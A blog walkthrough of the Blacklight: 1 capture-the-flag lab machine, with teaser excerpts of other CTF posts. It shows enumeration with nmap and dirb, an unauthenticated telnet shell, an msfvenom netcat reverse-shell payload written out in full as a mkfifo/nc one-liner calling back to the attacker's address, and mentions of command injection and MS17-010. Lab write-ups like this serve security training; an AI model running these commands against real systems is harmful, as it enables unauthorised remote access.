Blacklight: 1 Walkthrough

Lab Environment
Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux
Vulnerable Machine : Blacklight: 1
Let’s start hacking and breach the security of this machine
Scanning Phase : Let’s start with knowing our attacking machine’s ip
      Syntax used : ifconfig
              Results : 192.168.1.6

Now let’s scan our local network to which attacking machine and vulnerable machine is connected.
    Syntax used : arp-scan --local
    Results : 192.168.1.8


Enumeration Phase : Now using nmap to scan the services running on ports .
Syntax used : nmap -p- -A 192.168.1.8 -Pn
    Results   : http service is running on port 80 and one port 9072 is open




Now browsing the IP in browser to see the webpage running




Now fired up dirb to reveal the directories
Syntax used : dirb http;//192.168.1.8
Results : got something in robots.txt


Now browsing the url of robots.txt in browser  
Results : flag1.txt , blacklight.dict
Now opening the flag1.txt in browser
Syntax used : 192.168.1.8/flag1.txt
Results : value of flag and 9072 the secret is at home




Now tried to open the dictionary file named blacklight.dict
Syntax used : 192.168.1.8/blacklight.dict


After all this i tried to make connection on port 9072 with telnet and found that it is unsecured so we don’t need password .
Syntax used : telnet 192.168.1.8 9072
Results : on getting connected there’s a message displayed i.e type .help for instructions
From help we get to know we can only execute limited commands .


Since it’s a shell so i used a payload of cmd to get reverse shell with netcat
Syntax used : msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.6 lport=1337 R
Results : got the raw output of payload




Now , copied the raw output and pasted it into the shell obtained with telnet
Syntax used : .exec mkfifo /tmp/fgxypp; nc 192.168.1.6 1337 0</tmp/fgxypp | /bin/sh >/tmp/fgxypp 2>&1; rm /tmp/fgxypp
Explanation : .exec is used before the raw output of payload has in the telnet shell it can be clearly seen that .exec is to execute commands




Fired up netcat and got the reverse connection
Syntax used : nc -lvp 1337
Results : got the reverse connection




Syntax used : whoami
Results : root
Explanation : to know which user i am
Now spawning the shell
Syntax used : python  -c ‘import pty; pty.spawn(“/bin/bash”)’


As we know that at the time we opened the flag1.txt we got an message saying that the secret is at home so now it’s time to navigate to home directory and find the secret folder/file
After exploring got the directory named secret which was hidden.
Syntax used to view hidden directories : ls -la




Now entered the secret directory and got one more flag
Syntax used : cd .secret
Results : flag2-inside.jpg
Copied the flag2 file in var/www/html of a victim machine so that i can access it through browser
Syntax used : cp flag2-inside.jpg /var/www/html
Now browsed the victim’s ip with file name at the end
Syntax used : 192.168.1.8/flag2-inside.jpg
Results : got one image , saved image and it gave me the hint of using outguess tool as
Out and guess were capitalized




Used outguess to reveal the information inside the image
Syntax used : outguess -r /root/Desktop/flag2-inside.jpg -t flag2.txt
Explanation : r to access the file(on which operation has to be performed) from the location
t is used to write static information in file.
Here i used flag2.txt  as a name to get output in


Here’s the file named flag2.txt
Read the flag
Syntax used : cat flag2.txt
Results : flag2


Popular posts from this blog

Calculat3 M3 | CTF Learn

Image
This walkthrough will demonstrate the simple challenge based on command injection Calculat3 M3 This is the challenge page we got after visiting the given link. I provided random input in this calculator and intercepted the request with BurpSuite I got one parameter "expression" taking the values  Tried for command injection with ";ls" Forwarding the above request finally Got the Flag
Read more

TryHackme: Blue Walkthrough

Image
Task 1: Recon After we've connected to the tryhackme network the first task is to enumerate the target. We use Nmap for scanning the target IP. Command Used : nmap -sS -Pn <target-ip> -sS : Scan using TCP SYN scan -Pn : Treats all host as online --skip host discovery Next we used a command to find the vulnerability on the target machine. Command Used : nmap --script vuln <target-ip> --script : Specify the --script option to choose your own scripts to execute by providing categories , script file names, or the name of directories full of scripts you wish to execute. vuln : These scripts check for known vulnerabilites and generally only report results if they are found. Below, we see that nmap is indicating the target may be vulnerable to ms17-010(on the left0 and we can verify this using metasploit. To start Metasploit use command "msfconsole" We start by simply doing a search for ms17-010 Here we use module 2 i.e. exploit/windows
Read more

CTF - Dina : 1.0.1 walkthrough

Image
     Lab Environment  : Attacker’s Machine :  Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2(2017-11-08) x86_64 GNU/Linux Vulnerable Machine : Dina: 1.0.1 Scanning phase route -n (To know the gateway) i.e 172.16.60.2 arp-scan --local (to know the devices connected to the local network)   Vulnerable machine IP : 172.16.60.154           Using nmap for scanning the IP : nmap -sS -sC -sV  172.16.60.154 We got one open port i.e 80 and http service is active Since the port 80 is open and http service is active then we can open the IP in browser.   Another nmap syntax to know vulnerability if any : nmap --script vuln 172.16.60.154 Now further using dirb for scanning the directories : dirb http://172.16.60.154 Some results are obtained after using dirb .  Opened the http://172.16.60.154/robots.txt and found something interesti
Read more